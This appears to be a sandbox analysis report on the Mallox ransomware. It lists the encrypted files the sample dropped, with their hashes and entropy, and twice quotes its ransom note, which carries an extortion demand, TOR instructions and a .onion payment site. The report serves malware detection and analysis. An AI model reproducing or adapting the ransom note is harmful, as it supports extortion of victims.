                    Preview:$p..K6z=.....O.M..1.../`...C..C@-..v.\.-RZ&.IgYk..%.R.9].....j...K.A.U......l........]..L...H./F."y.B.4.o.<....0.>n:wb..l.mq6......k....5(..Rpc}..\.s.WZ.hC..2..>#....({....SUZkO/.r."..4~.Kj..=.*Ms..A/...6v(<.......a>..D$.....\....o..#6-....8X..e.....ES.3.w....<..4...@J76.W;.......*....[.:.z....t*....,lg..,..=u....\.V.m.n.w.!.....LHt=b@..........SZ]....a.....-........F..,..V(.y%.0.!...26...@.....&|wWp.,{.. i..Q..x/L&.:k..(.H_.j%...Zm"..../c...@*x....4'.w).2.D.ktE:.w\.X./W..n.].[i.=....%.A.<q.5D.kn......^.........E#...c..`.....v.G..?5...Gby...[.1,."N.f..=.....%.+.9z....E".........9.K.....<.....&.1).8#../...,..`..]....b..?...b.....@|.F..h."..I.1.ch...v....b.6..3u<.9.%..u.H..G...L....J.]..c.Pb.......f..mT".).."E..._......?.\.k0g..~7.n,..{.9.J. .......I....a..M.....*%..u....M(_.@.....HAKV..N84"s....]M... .......g....{..4.....:F....ma..7DH..Z.0.5.K..~W......lpR%...Q8...nA.N.yl1.p.`g.F<n..,..t5m.......D./u...}].............t.d\.N......7...A..f.X.

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):40982
                    Entropy (8bit):7.995741788416654
                    Encrypted:true
                    SSDEEP:768:3Pb+AYj3J2cabIy9meE8ThQ99a6D1UbPVLXwb2SSoSyBl3JdMCa2QxioiLxF9K:3DrYjkbIy9vU9ZCXwSIS6JqF2qrixTK
                    MD5:16001E43A9DB7F969D872B348EFC1AB2
                    SHA1:9DE108EEFBD22F9D88B0B960BC7EA7702ED05DF4
                    SHA-256:8DB815D8BDCA1F84DA46869E93990982AB5A7F93B93CEA456C6FC01EAEE8FF2C
                    SHA-512:6F0C368CA5B3B16EFA5B7ED324658EBA0B68FF7A308115D9EE6A35F417DCEC18340590E8249899689CAF7AB59E5D48AAAC3FCE6F87DEA68C91E242ABC0A7AA93
                    Malicious:true
                    Preview:V A.^.uN".....r$x..G]."b...dWDF....=..].>..>Z.$...KU. .\......?.....r...em.f.\H3..`..fe_.....j.K.V. o.b....z_...@\~d.E..D.....n.rP9.>.g..W....!'.m....X..4."a..[8..'.x.A.H..x..B..F.....Y..W~.>..5...xD.$7.(.<{.B.$......H...X....v..%..D..N{=yE.P.R...].7F|,...-..3Rn...B)0.m....8...=.^)..8^X|...E...M\..Dr.*-.i..s*V.........X..X..........>U...?.......6...9...A.AK..].)./.....{e...!V.#..d-"_..Ssv.!..y..}...x0.hCQ.........P..ljA.)........dI......l..R..7.=v..i|..q.B+i'..'.......X.(6-..L.w.d.3.....).C...o.:v.S.h9w.".Iu...(B....`..o...>..O\(.p.ZL...j.^..JtB.3.....W..(+...<...d.4...1.e'tHs..&..N...1..E~#7{.60a..0.....)1..EP..+..{.Xd.k.x&ml....".@.E.......S...ip....0.z.(,......q...:.z...m4..(....O......6wXo.>.A.i.RJ1....vhm.F1_$.w.|6.f...1.e-...........J..TY..[.G0...1....._..'A......?/ ..Wz.]...S..(.0#z>y;.3.....crwA.Ye..1C..... .....lM.?....V.T.s.)./K..S...a.U..N[..7.\V.t..=h%.B\S.....4Y.'...^s.......q.#...>7.,.b........]?..4.[UY.j7..@....=.<..l..3..Yn.>....

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):360825
                    Entropy (8bit):7.999602196635424
                    Encrypted:true
                    SSDEEP:6144:B8fCEXyouYZSPjSyPHxm2q8zcd0rqWYgxM6Q33znQriWMWEw2PJEeEcE1YsGzhZ:JECRYZSPjdBq8IdIi6MRHzQrrEDmxcSE
                    MD5:535217D1C180D8A7FB24BC3D66BB8CBA
                    SHA1:2873311F73F22EEA58CADAE70AB62AD552CAE59B
                    SHA-256:FB9AAAFB5B9C0862D0F82449C81EB70CB32F11DC3F83D804AF7199B2D641F4A8
                    SHA-512:597AD460C2067561503867E377C418DAF3F290F92429EA569C3829C535B4E937B035C23CD1873F711CED06ED66C58A93098FCBE236D89A88E163C808D8A957F2
                    Malicious:true
                    Preview:.V.R.3lvNo...I...Y.8=...L...d!0X.3.'...N#%..A..,.q......~..`../g..9.kf8.5l.=<S....u.C6..,..Y...D..T*.7b.?.{.erb.M.Ho....3T."..j...r8..s.%(... .. .b{.......U..J..{0.f!"c"n...F22.oL....4.D.L... 7..W.......I....@G...U.q.IG......+...T....br..q...M~.... ..+.r.1PWO..d.[.F^._d..E=.r...6...T4>....O.;.W.~..*.u\y.]b-.O...Qn...a.p3...^sZN.e....2~i].3.&.D.bt.Lm.g....G.C..Y...Kw.$5..u.8t.y...V7=..5z@<d9......T.c...a..7...<)-v=B[v.3S..7..........*.....".&..,.O....\..<>.<=.b.)....B....J.....+@..x..F......q.[.$....."g.........n......h..n...?3....+..$...-.h..`...Bv0.kM..z..:!.j......-...fYE.H..Q#.m.`.R...........?.........;..:..`..n.@..xG....1M.$[F...#....c=p.0....A.J*Z..^.....2.....5..U..?..S..C......_8.q.|.49..7h..1e.l.ko...R.[......j\...E.5t.S..Ho...@4dk.. ..n?..R.].5...~.C.(.X.2C.s`.e.'....0(.D.j*...........0,*......p....{...1|..9..p..Zk...J.....Y.rA..GR..ik.....!..x....E..F...}...]B8.f_....P.Gx./[..y...l..>.p....Z.RkT`...<.v...o j..4...R.a...d....+...Z.`.

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230170v1.xml

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):23732
                    Entropy (8bit):7.993453697180056
                    Encrypted:true
                    SSDEEP:384:UshG1B6CAe0/U1T5/SjSW3UPR+OIQG9AMMRAg7WTqzQLWbqjNIWnvP1Zf:UsG1B6CAxsTZSjSW3UPQPLPMugC1ibMN
                    MD5:1EC9484561606FB86B4A53689EC221DD
                    SHA1:55E24F8ACDCC45870037E0DE88DD57D49144726C
                    SHA-256:7F4097E19AD46E8AE16E8D9F8C6BF4935F054B19BAFEE74B4E336CDC9233394F
                    SHA-512:1F0C9DCD5A98598852B9BC900859FCC1F359C889F88D63D7ED856DE44E1C67A03CE078441D0C90B1A41213BEA97BA9721511B4CDBCF4E01238DE1EA663CF3E48
                    Malicious:true
                    Preview:...j.f.<.,......I5C..$).{........$P.(.]......}.z.w.....#:...]...M.W.EIs.".....p',...4.;...$.E.<A-...~.s...=.............f...!.$..0.K...V"..n9.....}...J.,?........j.`/..g.9.S.....30.F..p.>.......3.P%..3...6N:.I.",I...DU....G...?...sD..........\......w..c..W.......pF..,J.?w.f'.u...w.qw.....k.6G.h.3.p.l..!.../..R...d...e..P..a.:8.a..p...d9Yl..Bh.Lrf..Y.y.MnIe.By.>a.s...(.^X."..8R....#w..'..~.Nk.i.?.....@X...'.p&l.*.Y..T*!..h.)A....5.k.>...a%.i`...Z..rX.%...Z...A.N.".y.EX...O......o......Q....v.N....-0.U...+....,XF...;1K...y....G..0n~#beU...`.P...'..Z.]<.....fC.)Xp.O.W;U.y.k(.+o..G..oM.w..n6..W.'.A.?....^....4.D.uaO...G...=@...&eZ.....f.hK..|>R.(..k..n:]..2s.B.YJ.O@M..>W.l....^..R9.....w.%.m....'p...s..dl....x..mq..{..}.;a...+..>..Wl.{.K..ZP.Q.,B..yn.v..e........D..z+.Y.7.l..S^r. .A.y.v...&.1#..f..c\.p.QY.9...Cn..{zj1;6...q.j....O..~G..u5.O......DR..B.hqbj....(.z.....7.voV>/..D..!.N0G.+.^.6&.z.a~i.8..'.;*)..2.q.#....W..o....z..}o.)k...P...C.L

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230172v1.xml

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):31518
                    Entropy (8bit):7.994721623361359
                    Encrypted:true
                    SSDEEP:768:h6HMsCTBjPqNwYdub0q78q46ydIoya7dcrz:KMsCdjPqNwYdAthydI+7dcrz
                    MD5:D5F0E46BD096A6B4C8C51D2E1D29E764
                    SHA1:24A0D4D9B5826E79BAF66EDAA244F711B024617A
                    SHA-256:BE3ADA42FB302CFC1323C5802D4AD442D8B308BA09EB1C2587D0EB91E562871B
                    SHA-512:31C4CE0A1F58447211D193D0C0F33F040C9E347B87BDA079AA0B9A15BDFC710F448E1A39AFD1864F09346D7D90F7CC2636403DCCC0215F5CB3DEC49796DFD543
                    Malicious:true
                    Preview:.J.}..}.E..C.AB.e.f{;...C..D..[.:n..... .1..\W.R.%&...o.6D..~........y...(-q..\..W.....~.h...t...9!.3)..57a..L./tB.T.V^.CF.f..X....bR.... ..]H...E.....{.q.....D...W...f,cptuM..+.]qGT..!a..qK...z ....o.............H...2R....b.{2#.N.!?..|.......)*.K..Um./......g..n...!..`@>....B..:..J..iQQ....=..x.4..(...^.d|._wy...99Gdu.rY...;+Mr..o....0..0.`|..#..`3...T}.u..]....+.9(X..p...!ZT.x..EMD..z.E,..JZ.....p...+...1im.F.......T..Tq...P.p.I7R.T..A$..aGj..T?...2...+[g. .._..t/t..Wv..U6m..~.'(.....$Sq..L.\.1=*..(.b...?...h.....f..h.|..k....[..E.K.O...{.O^..3.X.f..S..0"..,J.......6.....6K-........_o!&._.8J..X,...'q...].1.f.D..`...m..%..#z...q..U.}..|.WLw.+G....&Kn..UM...+..&.............3.......`.u.=...$.....l.%..K7,.q..y......3[.].$.)G.].........&JR&..q2....K.0c&."Y...[.vBd..XD......ni....'~OD..W.&g~+b....E.....I..z.>."......i/....:.....*@3T....m?. ...Q~k!Z.EU.V..0....5..T5.%q..?..Q..T......X.S.8...l.:....2....N(.h:..O3:/.nI.+.....).?....

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):360825
                    Entropy (8bit):7.99947755837842
                    Encrypted:true
                    SSDEEP:6144:Ht/VP9gGyagCybcCPWr1S08p9AvWvrnDkGtAKj6Pov/vmMtuPDk:HtZ9gWgCycCer14A+HkGF6cnmM2Q
                    MD5:339EBD6B2350C59A7DE5945B0C2FA5DD
                    SHA1:CC44087DD59005C3A2E11AE73AE54BDEE7552F31
                    SHA-256:5448EF8A3DB7398AF52FD445B01A7993B6D5CBAFD7BDF2580DA014824853515F
                    SHA-512:6CE15D9FDFB1AC2463C252289EDC9C1D7D898F58E2C836D7C9C235D98E207E6E4A09B219E15DAAA522CEB8BFE2A187D5D25334CD229AAD06546D4DCC55EC4BD1
                    Malicious:true
                    Preview:.1D...k..J.a..L./..-(....3...c..A!.=W..tp..J.._..i..7...i...T.1...[MG .d|.41IQ....?.t.-.....o....rp..J.Wc$%..P,?.Il....c.,G.c.&r..i.y..zP..G&...V3....r..q[.....-*i:v.y.Q0.TX.q..e.(e$d.J........G..R....s,\.4.....%`....8....|......T.2c.."..JV.jNa..S.....2.r4.....h....;..`.}.d.............F...._.._.V......K8XU..4.....l>.e`c.b.o.&6...!p.].d\.......Ge5g.3....M..]|....#.>....|..r..:.+Ue.......r..Z...D..C.)...L.Ylo...............p..T...T.Z..O..N...b/.....S.u.>...9g.cnx*...........w:.[.......M....j.F...\E....^.'w.....,4..U.4.G.Y..$8..Y.......T[Z..h3.E...w.w$^.....`gQAR..%.Y.:.,h......a..Q...i..!....nx9....O...[.f..h.L.n..qq8.f.T.U.mB.<n......>.....!.G3.....<....^...}^@6.d..8...4.6S.>4R.I.?5L..M.m.N.......C..m......,q....7$P.v".BJ{.m}....gc.K....7...M3WB._.......%.m.f/k.~3......G(=......a........,... ...jK..f...v..A....eA.x=.f...<#T..Sd48oo...G.E...V..-..N.4...j,7..#..OP.i]..-.]...&....n.).{h.HS.ZkC.a.#.w^.+;.@w;......H.3a.@....p&..

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11446v1.xml

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):10837
                    Entropy (8bit):7.985262494038423
                    Encrypted:false
                    SSDEEP:192:5achtjYqYzCejfhvI83CXmkO8ZDUWh2KMNUhR/TVVWAPQVzRnbebg:nSqY+ejV7KZZDz5RNTV9oibg
                    MD5:6758F4129052BFF6311A4A04939FAF58
                    SHA1:AA90B688DAC737B4592F4DDC5CB1ACF5DB31454B
                    SHA-256:92FFCEBA9246B5BEDE8AD6C603B351B3509CAB071721FB3BF29F338918319D85
                    SHA-512:F23FBB83535EDE3B36C9F6641CD9AB6712B92EEEE16E8E31DD016B5E9131758B6BA034BDCAC9858783BAC948CA1E75BE24981603AF452277560C1B5CE9B28537
                    Malicious:false
                    Preview:...w.Q.:..Nk`..m.S..O....k....7..V....zT.g..S.Ig..C.D.....I{(O.$j.."1\.e.\..c..fQ........Z...V'.;.!F9.T.2....fY.*.Q..[..'..7........).d.SF.%=."....\>AN..sa..T.VX.X.a.t..X..........F.Jo...T.7...F?.&J....+..P.8...IA..l..&b.g..3....\.......#,....in.....r.BV.;.)..!d'..m.. H.2..o.s...=PcPY.G5..GjM....A.0!..k...:v..ty....Q..k.1{..F...|...{......4..a%.E....]..B;).p.~......g.....#.n..ll.=..K'...?fEH.F+ {.....]W.f..F.1.6.>.[1.10P.W..@..b.}....Hv:....>...t.}..^$.X....}.Z.jJ.Q.O....Fc.. ....U..35..q..o7$.,...F.V.E..........'.{..+..>.....t.5.58..cpX9..j....uHM1.o..-....Q.F..2z..0.VaK.....7..i`qJK.}.v.(...Gzy......9.c..b..N....J$...7.R\.'=J..!..%.....}.;.b..'"NS%.|c~..n...m.....Am..-.....dU...........]wC.b..n..pw.A.&0;...:...^..n...'<..u..b.pt.u..2k......M..A(...f5U.X*..l.....G.....4....0..I....1m[...ZZ..[..>.........../.%.....{..F...C .."k.:..;p:TBc..3b.....*..?....!.......t.c...%...H.G]....0..K..T.v ..r@....d.b..j.l.P.....................9..

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230170v1.xml

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):23733
                    Entropy (8bit):7.992125838964302
                    Encrypted:true
                    SSDEEP:384:l9TwsMP65BKhHJNV61eFatZGG2n/LDqTOG3V53BvXXUP3JTkSdmccJAw0v12ldH8:Dwl65BKDhFa/GTn/vu5xWJTkSQDWxQkD
                    MD5:FFD8DEC107E5CC32C92B92F2E04B8F37
                    SHA1:AB3A023EF69D6DE4C93AA94B1AD0CF8BA73CE213
                    SHA-256:FB9C2147463CD7EB591F19C6C738B7761926013661048687D29B92102F38DC0F
                    SHA-512:7A2E59D22348BEFCAEC76F2E4A55E8D5FD1D5B7AAEECEE9E0D3938E0D0FECC6029FDC0ED1947BC4C9F5191A2E03DFDA74BA20BADCF8A4D9F4E072C45AA57972F
                    Malicious:true
                    Preview:a...B.....r.b..;N..dq&:.y.B4Y..6..4..p..X4c.J..oS*.M.R.S.P...$9yB..Y.j*.#.V....*.RD..S.....uE..#.Eu..DCR|.....'0^Oe.\.....TD.. ..a4d7..w.U.e..sl.?f.........x.\..0u...m..Z.|J....G...b.1.....^.V7GH......DT.....v..(.HJ...b..M..x...)..P.L.WM..:.|_....Q....l.7..}s..,3..6.'^O.H....c.E...)*TcJ...l.?........xf.oc..3.>K.....H|...A...\U\aW.oZ`.K.......*c..hLS......dP...;...3...>p[6M:....|....:..........GK{s.......D...........z..SI..:.EO.}B.-..>n...C...x..km....;. O....JVn.~......PG..M........ y.;.9.iQ.<.eKz...`.8.!....X.A...H..Io....1....".l.f..a.......gJ...@Ho..|.. 7.|+.......~=81.w.6.]"O..*..s...:.]W...y.=<...y........~A.Y..~....T^..P.E.?. -.@6bK....yu..j..;..4.._..x.[.._.*<......#*E.~0.LN..-]..1.2...p.2...K..Pfu.<:...v..Y.A.Nd.^.....Om."H...:..7....._.YV.S....*..3.X....(.Q.kl..(.(Z.x...0)...N.H7J..A./..y.sj.l..c'...4t..~%.;..2//....sU........)'Qz[.k..I...l.{...@...Hn9\./...Jm...z.pV:..b.........R....A~.B...u(.c.EV....;..F.U.>..w.$cWt*

                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule230172v1.xml

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):31519
                    Entropy (8bit):7.993544345512345
                    Encrypted:true
                    SSDEEP:768:NUEXndfTpGSoHwyD8QJCncLlAAMIW9SGUMdWnmqzTg0N:qmdfTYHRD8QJrVdWbW5zTgu
                    MD5:F2F49FB4AC584B42E4881B14F45891C2
                    SHA1:0CEE7D5E7EA9AD2F359519A3681F16E91D440AB5
                    SHA-256:9373FE64B61CB4CAD41AEC24D9D9D3B7239FFD4AC73A0DECE64368DE72094178
                    SHA-512:04C827B26C5A83A0F1F754C62E0CB51968C3341754C8E187B1002125D442C36FDE6B843F16B8570151889BF8ED0F84727EB93807C01EB024047CE44EAE76BD1C
                    Malicious:true
                    Preview:q.......~..].1ob.2(..S=l...#....J.Ujw{..i...Ex.....v...1.g./.P.?..=_...).......?.T...s..u...0.p.t.,.^.&.a&.{.A.-U8K.!.9.....$..Y3..f...u...w...E#..i......g\.g.f.....2.NW;.`..| .V...G.7{UI:...r..s...p.){..7px...../X)....<-...%;@......~JM...u.LD..:.C.....t....b#.q..v...[P.`.Y.T.qO..m7.1&o... ..a...R..#.<.c..Z..B..i...y.......c..E.M..e...gI..F......#.9&.<,....i.X..-.&..-wi..wxx=@i..L....s..@.+....5.*.?..@"U..(1.Y.$.Z.;...9..i.+.Ln$y.^.d`.j..n%........'........3_..d........~.....n.L.f~...8..`....).x...6_......QW....P......uk.mUk......A[....;9.L/V@.X~z..^......M...F.uL:.RU..]..[.r.-.M......n.A..Y.....F!....(%..%.$^.*.....u........Mrg.*q:.e...7jvF.r....+.CN....:3`..G.....(.....X.!B....s.1i .3...M.Jv...H.s.g..c..c.....(.o(..-..4.\....wy%g......... .}....6.s.l1w.QAI...WB..:.4n.o...".G.....\]..=.).|\...UJ.C.......z.Pd.6....0.@.d...j.9C...O.0bSG..F.l...xt.KYgh.c.....Hv:S..]ok.j...$...@.....P.@G..1..;#.K!.O..r.........7%V=.o.(s...l.R.....*=..1J._(

                    C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):24684
                    Entropy (8bit):7.991310156079733
                    Encrypted:true
                    SSDEEP:768:Uh0AAvFSWcjIuHbMc0/b7e5lEq3B3GSdTbNFO/C:Uh0A4Cjkc0D7qG4Oa
                    MD5:91CE56564664DD4CF6825F5B4F7E1445
                    SHA1:BF517507BC5D0BE9ACC2E2A67CFDEA00AD333889
                    SHA-256:774A5E6A0023EBF058BFDEB47F570087B4CA85A5F8C64722B1A82379257B2C6E
                    SHA-512:3FF8A9E953A5BAF78CC0242ABC67A1AF2527DC39EBDF53CD5D7F8A1BECFDFE30B8542B0D9FE3D74CB262FFA5C7EB12DFB0840616933BED2426382A9117D27F81
                    Malicious:true
                    Preview:O7\;=PS..].....9.W.%)............i......-.g3=.B':.6z...2?~F.XK{...J?....(D,ML........|...x.....o.E.......lS...<S7.Z.;.'V.Ro.h....0.K.$.Fp....-........qb?Xe7A..D..0.M</T....i.#...J.....H..4...NaB....4.L..J..;M....r.d.e\."........}dA.!y..X...3m....{...5LU=z....mJL>.Y2.#%....5.$_...........a.X(a......M9M...%..0....l.....HV.:c.........+~.d .>...h.<.y..o..V...e.......!.H$..g..?=6`.D.5._...F.27...*8."X....I[Fs.N.;.,..`.9..m.z..8xy......zG]UY.. .=.E.oz.r.4...+...4.o1.B).M.A.:....C....-..HtI.......{......X..b...`.Z........3.:.....E.#.P$,.t.n..:....h.p.7G...`}D...|.H........,h.m.|sZ...~.t.......k...T3..I.e;.L`y....Zq.fL..."..s.:....iB........"..N....}.U..)...cj...N.oG'..o..Y..Mz"5K..)V.&.1..M..}...m....VI..,..g....%{..-.W..fk9K....O;GO.B..x.x..5...7..,...]...|*|S....j.x,.:...]W8.......v..CF..O.W.e...-..).pG..=D|?i..cD.h../|.u...*.m.%.'..K|.....c/.Oa..R7mo...Qh:..S_........M.E..?<..".D....}....I.j....gd.t....^........E.....Jl_Z.6%..T....w..../9.x.$

                    C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):24684
                    Entropy (8bit):7.991924023783889
                    Encrypted:true
                    SSDEEP:768:OBUPnVCNbmN2bjzHjVNEg1T2NGnPB/P51XXDxpr:3VCNbmN8o4npjnDn
                    MD5:4525821B993738DCC666A0BBC651248D
                    SHA1:8149FB07C456B777EF2CC04C97C5876E06ED8F39
                    SHA-256:B92CF6A3A5D5DD66BC33D678F7C975E521BEA0CCA77BCB99A51167FE3BBD69E8
                    SHA-512:B41A21E621A1787A7BDAF3656117BE5AEE03FEF0F959023093E1D0710744E34F70150843268A09E9AC838A6A140FB3D4CAB59C91B646E7121100FF47E2C4DE26
                    Malicious:true
                    Preview:d..[.2.Y..7.PQ..M...^.......P..W..W:E.C....Z|.m#......O.iK.../O.Mt.qo#..W._U.`.)..CEl0...v5.-j.E1DO......B.1.....A..',....I.;2fwB ....Rjo..{.DVd/n.M!..X.....b...W......#..Z.H.DP.W#.....>.T....tJ<%..4.&.c.P..vx.YP.b2.Q....&..eO?...rPLo?S_^... ..5G..]q...F...w..2{..2..P.. .*....U./d.Os]tm.....J).....59.NH.\c.|...}I{..I.B,.{....0S...P]....o..D..J..$Yi.D..7s....c.1.O..d.$.n1.Y.a..k.<...."..#..p...z.5~o.[..IRa.S..>..~j'.....=.r.w..8....d..|@..R/....@3+.._...S.g.$.......]..8.3..M.8.w*....%.......c.....T.P..D.^..s....3-..7.V....}.N.......p..t..S.v..1.....y5.i.}P.s.$-"...A.`.b.j9.N..Z.l.F.ne....?.X1)...bO,.*..;....O`5C%)T.F4.w.....R.....?.....Y....f.*../o...........e.w..&&...(6.i$}.o8...i....TYO.Rw..y8+:7.......K........q.>%.$.....I..r...1HX........K...V[...L..W...B:..?Y\..S....."....(l<....q.@VN.....W..]7O....^QX..\...r(.).\.[.Q..5....V.......G{ $8..w.M.m.0.p......d.}.^o.W.d.5..t......!/.W..q{6......8.b.Q.^..#C.>X.......#.F.a....8.3{5ag_...

                    C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):24684
                    Entropy (8bit):7.992249285267251
                    Encrypted:true
                    SSDEEP:768:n6OTSyXl9fkhy8ZedXMqXLKXCBAYRdegJe:n6k1XMQPtlKSA2e
                    MD5:B9ACB313E277DF746E433631C82F7E6F
                    SHA1:A4879DB76E48150E94A6F62EAA333B18742C42DB
                    SHA-256:E03DEC90EAE1B10DA2E7F12EFC20C1B75C22112B4EE5EB91871F04568CBEBD61
                    SHA-512:A99A5A75C7A560C9F983B4BCEDC3A7D0E61CAFCD1359FEDC5445FF74EE9B26279473CA3D6DD965898818516AD0DFE389D5885719BF9AD74E6366ACCF96301577
                    Malicious:true
                    Preview:Z....3. ...h.F.z./4h..#.8P..f.7...6...)3~&.....=.9'=..C@..{E.T.7i.]...7c.'.3t..F:......p.c..9.^..M.....|..+9v9.yf..O4F....ii.Il..M.r8^.>L.d.fv|.\.NL......8N...r.=..(j.G.W.~1.W.O.?..\p..<.>........N.`$(.8..pz.x~..1d..c.......H.EF.7.fN.E..jK......w.....\..f.1..\..2.....'....-..=.j.TMj..,...FJ.[........7..g.B.x...Sl..2....._.sDa.........'.3Xq.a.......@......[...ad."M`.V6.,2..@..3..,>....$S..T.c*sf.[j._.%0<.0.....ku.k{.Q)H..........\.&..6..K.3.G{k.A..XJ0.X...=..N.8.x...x].rw...=*.y..p..r..c%.6t.?...B,|.2.......P".\.Qa.......;..g...A}t...X07....m.G.....=.H..Iej.OEo '.?...f.....a..H}orK.:."..).:.RN....i.U...>...W.X......\"..#...<..H.M...#..(QDU....|.W.VU.&.].M.M.....tu....G\.A......).g.}..o.a.....bW.Fvy.~.;.V...m._.!.........jx...f...SO. @.B%qq..N..........H..S.........9......#..$V..J...I....~P.....z...D....6].....ES.kt.....<...,:..........#.E.R.-."......I..z.?!.......;..]xJ...2{..oajwJ...~.I...D..m.=.FS.m...].d.e....d.M.i.w~.|.f.....xb|).. F.

                    C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):24684
                    Entropy (8bit):7.992576935399091
                    Encrypted:true
                    SSDEEP:768:jnD19U4urqs4/Rt4Ud997xtcB7oZGovXBOq0G2:DD19ous4/34Udz6OGovKt
                    MD5:5F07173E84A11054FE1DD377E88EBC65
                    SHA1:DF861ACC65734875DAF38AE0922572DF34DFC847
                    SHA-256:9A1AC07DF9434B4BC0CA809E18D79CA6888241AEF268AF0A91B8B9B613DE66C4
                    SHA-512:43FA71ADA07B5BB8205376563B9FF169DAE4DCFF7842851EA3AE6EC401DFD51ABC907311B8F41A26094DCCEE084F0DBFA8C042F2CD6D8CDE4EA1B2BFF62C6377
                    Malicious:true
